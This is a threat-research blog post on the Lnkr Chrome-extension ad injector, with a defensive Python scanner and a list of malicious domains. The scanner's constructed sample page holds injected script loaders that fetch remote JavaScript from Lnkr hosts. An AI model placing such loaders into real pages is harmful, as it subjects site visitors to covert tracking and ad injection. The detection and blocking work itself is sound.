Previously Netskope Threat Labs published a blog post about a Lnkr ad injector campaign launched using Google Chrome extensions. As Figure 1 illustrates, the number of Lnkr infections spiked dramatically in November 2019 and again in the spring of 2020, when Brian Krebs uncovered information about the source of the infected Chrome extensions. Today, we’re revisiting the Lnkr adware because:
- We have observed a rise in the number of Lnkr infections starting in May and continuing through June, indicating that newly infected Chrome extensions are appearing again.
- We have identified new web pages that were infected with Lnkr and traced the root cause to a form of fanout: the infected extension in a user's browser injects the Lnkr script into any web page that user edits, so the infection spreads from the user to the site and on to every visitor of that page.
- We have identified 155 new domains hosting Lnkr that are associated with these new extensions and infected websites.
Infected users
The latest rise of infected users began in early May and continued through the month of June. As was the case in the previous two spikes, only Google Chrome users were affected. The infected extensions inject trackers and ads into the user’s web traffic, including online banking portals and intranet sites, giving the attackers detailed visibility into an infected user’s browsing habits.
The infection occurs when a user installs an infected extension. This might happen when:
- The user installs a new extension that is infected.
- The user updates to the latest version of an already installed extension that is newly infected.
External sources also indicate that Lnkr infections are widespread. ESET's Q1 report lists hardyload[.]com among the top 10 blocked malicious domains. This Lnkr domain ranks second in our own list, behind only brounelink[.]com. An excerpt of this report is shown in Figure 2.
We also found brounelink[.]com to be the primary domain used in a widespread infection affecting school students. A Google Chrome support post stated, “Students were unable to access shared documents, watch embedded videos, save work in Google drive, and use Google Hangouts. Once allow listed, www.brounelink[.]com in Trend, all the problems went away.” An excerpt of the article is shown in Figure 3.
Infected web pages
Netskope Threat Labs has identified more than 1,500 web pages that were infected with Lnkr. There are several ways a website might become infected with Lnkr. For example, the owner of the website might deliberately include the code for monetization, or a developer might accidentally infect the website if they themselves are infected. We found multiple examples of websites that were accidentally infected. In one example, a Marketo web page was accidentally infected when an infected user edited the page in the browser: the infected Chrome extension injected the Lnkr script element into the DOM of the page, as it does on every page the user views, and the browser-based editor serialized that injected element back into the HTML along with the legitimate content. The user saved their changes, which now included the Lnkr code, and published them to the website.
These accidental infections follow a similar pattern to our October 2019 post showing how GitHub Pages sites became infected with Ramnit. In the Ramnit case, the culprit was a file infector that infected the files in a GitHub repository. In the Lnkr case, an infected Chrome extension injected the Lnkr script into web pages that were being edited in the browser.
This ad’s for us
Netskope Threat Labs analyzed more than 1,000 Lnkr ad injector scripts, including the scripts hosted on the 155 new domains we identified, and found that they all referenced the same domain: thisadsfor[.]us, as shown in Figure 4.
As described in Brian Krebs's article, the domain thisadsfor[.]us is registered to Frank Medison (Email – frankomedison1020@gmail[.]com), who has also been tied to similar websites related to dodgy toolbars, add-ons, and extensions. The references to thisadsfor[.]us from all of the new domains we identified indicate that this is either the work of the same actor or a new actor that has borrowed from the earlier work without making any significant changes.
Conclusion
The Lnkr campaign is active and still under development. Netskope Threat Labs recommends you:
- Audit the extensions installed in your Chrome browser at chrome://extensions and remove any affected extensions.
- Search your website's HTML for the domains listed at the end of this post and remove any scripts or links that reference them, including inline scripts that build a URL on one of these domains at runtime.
- Block the domains listed at the end of this post.
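The Marketo fanout case above and the second recommendation both come down to the same check: does a page's HTML reference any of the Lnkr hosts, either as an external script/link target or inside an inline loader? The scanner below is an added example for this post, not Netskope Threat Labs code. It takes a subset of the defanged indicators named in the post (extend the list with the full set below), refangs them, flags external references to those hosts or their subdomains and inline script text that mentions them, and strips the offending script elements so the cleaned HTML can be republished. The sample landing page is constructed for illustration; the two injected loaders in it are modelled on the behaviour described above, not copied from a real infected page.

```python
"""Scan saved HTML for references to Lnkr infrastructure and strip injected scripts.

Added example for this post, not Netskope Threat Labs code. The sample page
below is constructed for illustration; the indicator list is a subset of the
domains named in the post, written defanged as the post prints them.
"""
import re
from html.parser import HTMLParser
from urllib.parse import urlparse

# Defanged indicators copied from the post (subset; extend with the full IOC list).
LNKR_DOMAINS_DEFANGED = [
    "thisadsfor[.]us",
    "brounelink[.]com",
    "hardyload[.]com",
    "cdn-mxpnl[.]com",
    "www[.]billyjons[.]net",
]


def refang(domain):
    """Turn a defanged indicator such as 'foo[.]com' back into a matchable hostname."""
    return domain.replace("[.]", ".").strip().lower().rstrip(".")


LNKR_DOMAINS = frozenset(refang(d) for d in LNKR_DOMAINS_DEFANGED)


def host_matches(host, domains=LNKR_DOMAINS):
    """True if host is an indicator or a subdomain of one (www.brounelink.com matches brounelink.com)."""
    host = (host or "").lower().rstrip(".")
    return any(host == d or host.endswith("." + d) for d in domains)


# Attributes that can pull content from, or send users to, an attacker-controlled host.
URL_ATTRS = {"script": "src", "iframe": "src", "img": "src", "a": "href", "link": "href"}


class LnkrScanner(HTMLParser):
    """Collects external references to indicator hosts and inline script text that names them."""

    def __init__(self, domains=LNKR_DOMAINS):
        super().__init__()
        self.domains = domains
        self.findings = []
        self._in_script = False

    def handle_starttag(self, tag, attrs):
        if tag == "script":
            self._in_script = True
        attr = URL_ATTRS.get(tag)
        value = dict(attrs).get(attr) if attr else None
        # Relative paths have no host and are ignored; protocol-relative '//host/x.js' is handled.
        if value and host_matches(urlparse(value).hostname, self.domains):
            self.findings.append({"kind": "external-ref", "tag": tag, "url": value,
                                  "line": self.getpos()[0]})

    def handle_endtag(self, tag):
        if tag == "script":
            self._in_script = False

    def handle_data(self, data):
        # html.parser hands <script> bodies to handle_data verbatim, so loaders that
        # assemble the Lnkr URL at runtime are caught here as well.
        if self._in_script:
            lowered = data.lower()
            for d in sorted(self.domains):
                if d in lowered:
                    self.findings.append({"kind": "inline-script", "domain": d,
                                          "line": self.getpos()[0]})


def scan_html(html, domains=LNKR_DOMAINS):
    """Return a list of findings (empty when the page references none of the indicators)."""
    parser = LnkrScanner(domains)
    parser.feed(html)
    parser.close()
    return parser.findings


SCRIPT_RE = re.compile(r"<script\b([^>]*)>(.*?)</script\s*>", re.I | re.S)
SRC_RE = re.compile(r"""\bsrc\s*=\s*["']?([^"'\s>]+)""", re.I)


def strip_lnkr_scripts(html, domains=LNKR_DOMAINS):
    """Remove <script> elements that load from, or whose body mentions, an indicator host."""
    def repl(match):
        attrs, body = match.group(1), match.group(2).lower()
        src = SRC_RE.search(attrs)
        if src and host_matches(urlparse(src.group(1)).hostname, domains):
            return ""
        if any(d in body for d in domains):
            return ""
        return match.group(0)
    return SCRIPT_RE.sub(repl, html)


# Constructed sample: a legitimate landing page with two injected loaders.
SAMPLE_HTML = """<!doctype html>
<html><head>
<title>Request a demo</title>
<link rel="stylesheet" href="/css/site.css">
<script src="/js/forms.js"></script>
<script type="text/javascript" src="//cdn-mxpnl.com/lib/track.js"></script>
</head><body>
<a href="https://www.example.com/contact">Contact us</a>
<script>
  var s = document.createElement('script');
  s.src = 'https://www.brounelink.com/s.js?ref=thisadsfor.us';
  document.head.appendChild(s);
</script>
</body></html>
"""

if __name__ == "__main__":
    for finding in scan_html(SAMPLE_HTML):
        print(finding)
    print("after cleanup, findings:", scan_html(strip_lnkr_scripts(SAMPLE_HTML)))
```

Run it over exported page templates or a crawl of your own site; any finding is a page to re-edit from a clean browser. Matching on the host rather than the full URL matters because the injected loader URLs carry changing paths and query strings, and matching subdomains (www[.]billyjons[.]net is listed explicitly, but brounelink[.]com also appears as www[.]brounelink[.]com in the school report above) avoids misses when the actor adds a prefix.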
Indicators of compromise
Updated set of Lnkr URLs (including the 155 new domains)
thisadsfor[.]us
plusdroop[.]net
coolpagecup[.]com
cooljorrd[.]com
platewolf[.]com
nightroi[.]com
bugdepromo[.]com
tracksmall[.]com
jaramyouk[.]org
marryjoy[.]net
ideafrank[.]com
rayanplug[.]xyz
signagetop[.]org
transmapp[.]com
magictraps[.]com
protrois[.]com
craftprimes[.]com
cilkonlay[.]com
pagescr[.]cool
jobsaddy[.]xyz
mikkymax[.]com
donewrork[.]org
cozytech[.]biz
minisrclink[.]cool
clipsold[.]com
criticalltech[.]com
vildlonger[.]com
dashvintage[.]biz
toolsmagick[.]com
linkpowerapp[.]com
extnetcool[.]com
darkflags[.]net
crisgrey[.]com
peterjonny[.]com
mobiclean[.]xyz
linkojager[.]org
higedev[.]cool
cloffext[.]com
flexylincks[.]com
miniklixk[.]org
protesidenext[.]com
outsource[.]cool
golinkapp[.]com
remaideout[.]com
oilcloze[.]com
roxlock[.]com
dimagesrc[.]com
brounelink[.]com
autroliner[.]com
klarittyjoy[.]com
cdn-mxpnl[.]com
www[.]billyjons[.]net